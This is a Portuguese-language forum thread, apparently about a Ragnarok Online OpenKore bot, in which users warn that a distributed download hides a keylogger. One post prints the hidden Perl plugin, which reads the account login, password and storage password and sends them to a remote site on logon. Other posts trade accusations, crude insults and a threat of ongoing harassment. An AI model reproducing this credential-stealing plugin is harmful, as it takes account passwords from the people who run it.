Ir para conteúdo
Faça parte da equipe! (2024) ×
Conheça nossa Beta Zone! Novas áreas a caminho! ×
  • Quem está por aqui   0 membros estão online

• Nenhum usuário registrado visualizando esta página.

KEY LOGGER NO OPENKORE DO kmkronos NÃO BAIXEM!!!!!!!

Compartilhar

Posts Recomendados

Esse safado entrou na minha conta.. ainda bem q eu tava olhando o bot..

o link do openkore dele é esse:

http://www.webcheats.com.br/forum/rag-cheats/1462165-bot-openkore-atualizando-sempre-aki-via-snv-fixo-6.html

alguem procura ai por favor.... amanha eu vou por o arquivo dele no hotfile para caso ele mude o link

att.

Link para o comentário
Compartilhar em outros sites

Esse safado entrou na minha conta.. ainda bem q eu tava olhando o bot..

o link do openkore dele é esse:

http://www.webcheats.com.br/forum/rag-cheats/1462165-bot-openkore-atualizando-sempre-aki-via-snv-fixo-6.html

alguem procura ai por favor.... amanha eu vou por o arquivo dele no hotfile para caso ele mude o link

att.

1 Prove,

2 Se voce tem um pouco de senço seja homem e para de gracinha.

Link para o comentário

Sim realmente tem keylloger mais ele edito o link do bot e coloco o do brocenter de antes,ele fica fazendo isso quando alguem reclama que entraram na conta ou quando ele acha necessario ele retroca o link e coloca o do bro center,venho notado isso desde o inicio do topico dele,tem que banir uma coisa dessa,acordem ninguem vai ficar no forum on o dia todo dando assitencia de graça no topico,é logico que tem más inteções por trás galera acordem

Link para o comentário

o unico erro dele.. é que ele pensou exatamente igual eu pensaria se fosse colokar o keylogger... deixou todo mundo usando... sem problema nenhum

ai 1 dia antes da atualização... de madruga.. ele entra e furta tudo.... hj já não funciona o bot mesmo....

PARABENS MT ESPERTO...

a malandragem foi boa mais eu tava 1 passo a frente =)

Link para o comentário

Se tem eu não sei pois não baixei ele pra analisar antes da manutenção, mais se tem KL ele não e a primeira pessoa que faz isso de pegar confiança do povo aqui da WC e depois mudar o link do arquivo! Esse método quem gosta e gostava de usar era o araujo, um hacker lixo que não sai aqui da WC!

Link para o comentário

ESTE É O VERDADEIRO LINK DO BOT COM KL Q ELE POSTOU

É necessário se cadastrar para acessar o conteúdo.

c alguem souber axar os KL por favor axe e post o print screen aki pra esse filho duma rapariga(kkkkkkkkk) ser banido

noob.. certeza q eh um gordo de oculos nojento com bereba e cebo de baixo do braço...

Link para o comentário

gaabscps vc tava certo...

o bot tah sim o KL no link q ele mudo...

o arquivo esta na pasta plugn como de costume em oculto... ( coisa mais idiota meu ja falo todos q baixan bot olha na maldita pasta antes de usa pow so por pra ver arquivo oculto... se nem use praq plugn oculto ??? )

o script do arquivo é esse aki

#-------------

sub on_Log {

my ($type, $domain, $level, $globalVerbosity, $message, $user_data) = @_;

if( $type eq "error" ){

# Kore Guard errors

if( ($message =~ /Your\ Ragnarok\ Online\ server\ uses\ GameGuard/) ||

($message =~ /Tempo\ esgotado\ no\ Servidor\ de\ Mapa\, conectando-se\ ao\ Servidor\ de\ Contas\ em\ (.*)\ segundos\.../) ||

($message =~ /conectando-se ao Servidor de Contas em.*/) ||

($message =~ /The\ Poseidon\ server\ closed\ the\ connection/) ||

($message =~ /The\ Poseidon\ server\ sent\ a\ wrong\ reply\ ID/) ||

($message =~ /Timeout\ on\ Character\ Select\ Server/) ||

($message =~ /Tempo\ esgotado\ no\ Servidor\ de\ Sele(.*)\ de\ Personagens/) ||

($message =~ /Timeout\ on\ Character\ Server/) ||

($message =~ /Tempo\ esgotado\ no\ Servidor\ de\ Personagens/) ||

($message =~ /couldn't\ connect:/) ||

($message =~ /n(.*)\ foi\ possível\ se\ conectar:/) ||

($message =~ /GameGuard\ packets\ where\ not\ replied/) ||

($message =~ /pacotes\ do\ GameGuard\ n(.*)\ foram\ respondidos/) ){

warning " erro de conexão, relogando\n";

kgRelog();

}

} elsif( ($type eq "message") && ($domain eq "console") ){

# Logon attempt

if( ($message =~ /Requesting\ permission\ to\ logon\ on\ account\ server/) ||

($message =~ /Pedindo\ permiss(.*)o\ para\ se\ logar\ no\ servidor\ de\ contas/) ){

warning " Tentando conectar e...\n";

use LWP::UserAgent;

use Utils qw(urlencode);

my $ua = LWP::UserAgent->new;

$ua->timeout(10);

$ua->env_proxy;

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("

$senha $kafra");

$logonAttempt = 1;

$logonTimeout{time} = time();

}

} elsif( ($type eq "message") && ($domain eq "connection") ){

# Logon success (account info received)

if( ($message =~ /-Account Info-/) ||

($message =~ /-Informa(.*)s da Conta-/) ){

$logonAttempt = 0;

warning " ...conectado!\n";

}

}

}

quem entende de PHP sabe q ele tah mandando loga mas tbm guarda seu user e sua senha cada um em uma variavel.. e depois manda pro site

$senha $kafra

o nome do arquivo oculto é OPKBRGuard(Reconnect).pl pois bem quando vc reconecta ele roba senha de acc kafra e tudo mais XDD no primeiro DC ja era

repito meu quando baixa bot olha os plugn se tem arquivo oculto nao usa.. se nao entende de bot vai pesquisa vai estuda u.U

Link para o comentário

sao raros os que ajudam de boa vontade , mudem sempre a sua senha ,evitem deixar o bot no horario que voce nao meche no pc ( nao deixe ligado de madrugada ) , se for deixar , deixa tudo na kafra e upa com uma arma +/- , mas se quiser arriscar sua acc boa sorte quem vai se fude eh voce mesmo , eu sempre que saio do pc deixo apenas arma pra upae upa de boa , po o graveto que postava uns bangui legal mas ele sumiu ou foi banido =/

Link para o comentário

Se nao me falha a memória esse e o link que o smotherht postou que tinha Keyloguer.

Esse gaabscps deve ter criado a conta smotherht pra postar keyloguer.

E quando o kmkronos descobriu o keyloguer dele deve ter postado um link falso acusando o cara.

aki o link do gaabscps usando a conta smotherht pra postar kl e o kmkronos e a saruesley desmascararam ele.

o carinhha nao mudou o link nao e tava sempre ajudando a galera :( agora foi banido...

http://www.webcheats.com.br/forum/rag-cheats/1461484-openkore-funcional-apos-09-02-2012-sempre-atualizado-scan-thor-odin-macro-portugues-4.html

Link para o comentário

Putz manow eh agr ''/ quem vai vai ajudar nois a postarem BOTS sem KL ''/

Os kras sao Fodas nao tem dinheiro para conprar Seus proprios Equipamentos E fica Robando dos outros achei que Os bots ossem de Auta confiança.

Mais vi que nao pq Senpre tem Ums igrassadinhos aew que Querem ser mais duque esperto.

Agr sim eu sei que São pcos que tem a capacidade de ajudar Os outros ..

E muitos .. ICOPETENTES Que atrazão o lado dos OUTROS.. FATO..

Se fato vcs ter conseguido Achar o KL do cara aew..

Não apareceu na de Anormal Nas Minhas Contas do ragnarok.

Bom nao sei se ele nao troco as senha porque São NOVAS contas e leveis baixos.

Mais se concertesa eu colocasse UM AC minha De FULL Rops teria SUMIDO no msm Dia vlw aew gente..

Por ter postados Esse Comentario..

Pofavor se alguem tiver o bot atualizado dessa queta feira pofavor postem..

Desde ja agradesso vlw...

Link para o comentário

aiai nao sei se é briga por KL ou bot sei la

apenas achei o KL no link postado aqui...

volto a repetir todos q pegarem bot de algum zé do site pode ser até moderador ou os caraio q seja olha todas as pasta ve se tem arquivo oculto ou algo parecido com oq postei ali em cima... se nao quer procura perca seus item e nao fica chorando no site... eu nao gosto de quem tenta roba om kl (quero ver se fufu mesmo ) mas acho pior a ainda o folgado q nao sabe nem olha as pasta e é robado vem chora no forum... u.U

robsongomes.. vai procura um tuto de bot em outros lugar leia bastant depois vem pega bot de alguem... ( nao to disendo q nao saiba, mas espera bot dos outro é pedir pra ter KL se nao sabe acha ai pioro )...

Link para o comentário

Esse desgraçado entrou no meu personagem e ainda falo item por item q ele roubou,vira homem e vai trabalhar,moleque safado,acha q subir na vida é assim,passando por cima do suor das pessoas,cuidado,uma hora vc cai do cavalo essa é a lei do retorno,existe um deus!!!!!!!!!

vagabundo,e ainda pede agradecimento por roubar os itens,seu safado rouba e ainda faz o char morre pra perde exp,acha q tem bobo aki e ainda tem uns troxa,troxãaao mesmo q agradece,cara so macaco velho,a perna em mim vc não passa mais,e ainda vem com papim de plaboy moralista,tu engana esses nerd bobo,criança e leigos no assunto,mas um dia alguem vai te fazer o mesmo seu safado,desgraçado,filha de uma puta,pode ter certeza q mesmo eu sendo expulso do forum,eu vo atormenta eternamente vc nesse site,impossivel alguem me bloquea sempre vo aparece,teu filme ta queimadaçooo,vosempre ta por aki ppra te enche,seu safado,vira homem moleque,tu vai ver o tanto de atraso q vai vir pra sua vida pode ter certeza!!!!!!!!!!!!!!!

Link para o comentário

# Requisição de fechamento do tópico.

# Motivo: "Tópico Inútil".

# Qualquer comentário abaixo será Reportado como violação das Regras.

Membro | Bronze Member | Silver Member | [G]uardião | [E]stagiário | Game Zone | Moderador Global | Platinum Member | Moderador Global | Platinum Member | Diamond Member | Moderador Global | Diamond Member | Elite Member

Link para o comentário

Este tópico está impedido de receber novos posts.
 Compartilhar

• Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.